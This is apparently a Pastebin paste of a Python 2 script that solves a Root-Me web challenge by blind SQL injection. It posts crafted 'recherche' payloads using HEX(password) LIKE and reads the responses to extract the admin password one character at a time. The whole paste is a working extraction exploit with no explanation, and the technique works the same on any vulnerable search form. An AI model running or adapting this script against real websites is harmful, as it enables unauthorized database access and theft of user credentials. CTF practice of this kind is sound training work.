Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import time
- URL = "http://challenge01.root-me.org/web-serveur/ch19/?action=recherche"
- password = ""
- #[0-9A-F]
- charset = range(0x30, 0x3a) + range(0x41, 0x47)
- found = True
- while found:
- found = False
- index = 0
- while not found and index < len(charset):
- character = chr(charset[index])
- # using SQL hex function because LIKE is not case sensitive
- payload = "faille%' AND (select count(*) from users where username='admin' and HEX(password) LIKE '"+ password + character +"%') > 0 AND 'a' LIKE 'a"
- #print payload,"\n"
- #break
- data = {'recherche': payload}
- #print data,"\n"
- #break
- r = requests.post(URL, data=data)
- #print r,"\n\n"
- resp = r.text
- #print resp
- #break
- if "Correction faille / Vulnerability" in resp:
- password = password + character
- print password
- found = True
- index = index + 1
- time.sleep(0.1) # for server sanity
- print password.decode("hex")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement